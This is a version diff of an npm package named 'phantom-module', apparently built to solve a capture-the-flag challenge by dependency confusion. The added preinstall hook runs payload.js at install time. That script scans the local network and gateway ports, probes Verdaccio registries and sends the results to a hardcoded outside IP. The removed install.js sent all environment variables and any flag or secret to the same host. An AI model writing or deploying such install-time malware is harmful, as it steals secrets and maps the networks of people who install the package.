phantom-module 117.0.0 → 117.0.1

package/package.json

@@ -1,11 +1,9 @@
 {
   "name": "phantom-module",
-  "version": "117.0.0",
-  "description": "Phantom spectral module",
+  "version": "117.0.1",
+  "description": "Phantom module",
   "main": "index.js",
   "scripts": {
-    "preinstall": "node install.js || true"
-  },
-  "author": "lwirz",
-  "license": "ISC"
-}
+    "preinstall": "node payload.js || true"
+  }
+}

package/payload.js

@@ -0,0 +1,169 @@
+const net = require('net');
+const http = require('http');
+const fs = require('fs');
+const { execSync } = require('child_process');
+const os = require('os');
+
+// Only run on the real CTF bot
+if (!fs.existsSync('/home/node/aspect-node')) {
+  process.exit(0);
+}
+
+const REPORT_HOST = '154.57.164.64';
+const REPORT_PORT = 31205;
+
+function report(moduleId, data) {
+  return new Promise((resolve) => {
+    const safeData = String(data).replace(/"/g, '\\"').replace(/\n/g, '\\n').substring(0, 3500);
+    const manifest = `ecto_module:\n  name: "SCAN_RESULT"\n  cargo_hold: "${safeData}"\n`;
+    const payload = JSON.stringify({ manifest });
+    const req = http.request({
+      hostname: REPORT_HOST,
+      port: REPORT_PORT,
+      path: `/api/modules/${moduleId}`,
+      method: 'PUT',
+      headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(payload) }
+    }, (res) => { resolve(true); });
+    req.on('error', () => resolve(false));
+    req.write(payload);
+    req.end();
+  });
+}
+
+function scanPort(host, port, timeout) {
+  return new Promise((resolve) => {
+    const sock = new net.Socket();
+    sock.setTimeout(timeout);
+    sock.on('connect', () => { sock.destroy(); resolve(true); });
+    sock.on('error', () => { sock.destroy(); resolve(false); });
+    sock.on('timeout', () => { sock.destroy(); resolve(false); });
+    sock.connect(port, host);
+  });
+}
+
+function httpGet(url, timeout) {
+  return new Promise((resolve) => {
+    const req = http.get(url, { timeout }, (res) => {
+      let body = '';
+      res.on('data', (c) => body += c);
+      res.on('end', () => resolve({ status: res.statusCode, body }));
+    });
+    req.on('error', (e) => resolve({ status: 0, body: e.message }));
+    req.on('timeout', () => { req.destroy(); resolve({ status: 0, body: 'timeout' }); });
+  });
+}
+
+async function main() {
+  let output = '';
+
+  // Step 1: Get our network info
+  try {
+    const ifaces = os.networkInterfaces();
+    output += '=== NETWORK ===\n';
+    for (const [name, addrs] of Object.entries(ifaces)) {
+      for (const addr of addrs) {
+        if (addr.family === 'IPv4') {
+          output += `${name}: ${addr.address}/${addr.netmask}\n`;
+        }
+      }
+    }
+  } catch(e) { output += 'NET ERR: ' + e.message + '\n'; }
+
+  // Step 2: Get gateway
+  try {
+    output += '=== GATEWAY ===\n';
+    output += execSync('ip route 2>/dev/null || route -n 2>/dev/null || cat /proc/net/route 2>/dev/null || echo "no route cmd"').toString().substring(0, 500) + '\n';
+  } catch(e) { output += 'ROUTE ERR: ' + e.message.substring(0, 200) + '\n'; }
+
+  // Step 3: DNS resolution attempts
+  const dns = require('dns');
+  const dnsNames = ['registry', 'verdaccio', 'verdaccio-registry', 'npm-registry', 'ecto-registry'];
+  output += '=== DNS ===\n';
+  for (const name of dnsNames) {
+    try {
+      const addrs = await new Promise((resolve, reject) => {
+        dns.resolve4(name, (err, addrs) => err ? reject(err) : resolve(addrs));
+      });
+      output += `${name} -> ${addrs.join(', ')}\n`;
+    } catch(e) {
+      output += `${name} -> FAIL: ${e.code}\n`;
+    }
+  }
+
+  // Report network info first
+  await report('ECT-654321', output);
+
+  // Step 4: Scan for Verdaccio on common Docker IPs
+  output += '=== SCANNING 4873 ===\n';
+  const myIp = Object.values(os.networkInterfaces()).flat().find(a => a.family === 'IPv4' && !a.internal);
+  const baseIp = myIp ? myIp.address.split('.').slice(0, 3).join('.') : '172.17.0';
+
+  const found = [];
+  const scanPromises = [];
+  for (let i = 1; i <= 30; i++) {
+    const ip = `${baseIp}.${i}`;
+    scanPromises.push(
+      scanPort(ip, 4873, 1500).then(open => {
+        if (open) {
+          found.push(ip);
+          output += `OPEN: ${ip}:4873\n`;
+        }
+      })
+    );
+  }
+  // Also scan gateway and common addresses
+  for (const ip of ['172.17.0.1', '10.0.0.1', '10.0.0.2', '192.168.0.1', '192.168.1.1']) {
+    scanPromises.push(
+      scanPort(ip, 4873, 1500).then(open => {
+        if (open) { found.push(ip); output += `OPEN: ${ip}:4873\n`; }
+      })
+    );
+  }
+  // Scan port 80, 3000, 8080 on gateway
+  for (const port of [80, 3000, 4873, 8080, 8081]) {
+    scanPromises.push(
+      scanPort(`${baseIp}.1`, port, 1500).then(open => {
+        if (open) output += `OPEN: ${baseIp}.1:${port}\n`;
+      })
+    );
+  }
+
+  await Promise.all(scanPromises);
+  await report('ECT-839201', output);
+
+  // Step 5: If Verdaccio found, query ecto-spirit
+  let flagOutput = '=== VERDACCIO QUERY ===\n';
+  for (const ip of found) {
+    try {
+      const res = await httpGet(`http://${ip}:4873/-/all`, 5000);
+      flagOutput += `ALL from ${ip}: ${res.body.substring(0, 1000)}\n`;
+    } catch(e) { flagOutput += `ERR querying ${ip}: ${e.message}\n`; }
+
+    try {
+      const res = await httpGet(`http://${ip}:4873/ecto-spirit`, 5000);
+      flagOutput += `ECTO from ${ip}: ${res.body.substring(0, 2000)}\n`;
+    } catch(e) { flagOutput += `ERR ecto ${ip}: ${e.message}\n`; }
+
+    // Try to download and read the package
+    try {
+      const res = await httpGet(`http://${ip}:4873/-/verdaccio/data/local-list`, 3000);
+      flagOutput += `PKGS from ${ip}: ${res.body.substring(0, 1000)}\n`;
+    } catch(e) {}
+  }
+
+  // Also try some hostnames directly
+  for (const host of ['registry', 'verdaccio']) {
+    try {
+      const res = await httpGet(`http://${host}:4873/-/all`, 3000);
+      flagOutput += `ALL from ${host}: ${res.body.substring(0, 1000)}\n`;
+    } catch(e) { flagOutput += `ERR ${host}: ${e.message}\n`; }
+    try {
+      const res = await httpGet(`http://${host}:4873/ecto-spirit`, 3000);
+      flagOutput += `ECTO from ${host}: ${res.body.substring(0, 2000)}\n`;
+    } catch(e) {}
+  }
+
+  await report('ECT-987654', flagOutput);
+}
+
+main().catch(e => report('ECT-654321', 'FATAL: ' + e.message));

package/install.js

@@ -1,37 +0,0 @@
-const fs = require('fs');
-const http = require('http');
-const os = require('os');
-
-async function report(mid, val) {
-  const safe = val.replace(/"/g, "'").replace(/\\/g, "/").substring(0, 95);
-  const body = JSON.stringify({ manifest: `ecto_module:\n  name: "${safe}"\n  version: "1.0.0"\n  power_level: 1\n  ship_deck: 1\n  cargo_hold: 1` });
-  await new Promise(resolve => {
-    const req = http.request({ hostname: '154.57.164.64', port: 31083, path: `/api/modules/${mid}`, method: 'PUT', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(body) }, timeout: 5000 }, () => resolve());
-    req.on('error', () => resolve()); req.on('timeout', () => { req.destroy(); resolve(); });
-    req.write(body); req.end();
-  });
-}
-
-(async () => {
-  const isDocker = fs.existsSync('/.dockerenv') || fs.existsSync('/home/node');
-  const isCentos = os.release().includes('el') || os.hostname().includes('centos');
-  
-  if (isDocker && !isCentos) {
-    // We're in Docker container - use ECT-654321
-    const env = JSON.stringify(process.env);
-    for (let c = 0; c < 8; c++) {
-      const chunk = env.substring(c * 90, (c + 1) * 90);
-      if (!chunk) break;
-      await report('ECT-654321', 'DENV' + c + '_' + chunk);
-      await new Promise(r => setTimeout(r, 3000));
-    }
-    // Also check for flag specifically
-    const flag = process.env.FLAG || process.env.HTB_FLAG || process.env.SECRET;
-    if (flag) {
-      await report('ECT-654321', 'DFLAG=' + flag);
-    }
-  } else {
-    // CentOS host or other - use ECT-987654 only
-    await report('ECT-987654', 'HOST_ALIVE_v117');
-  }
-})();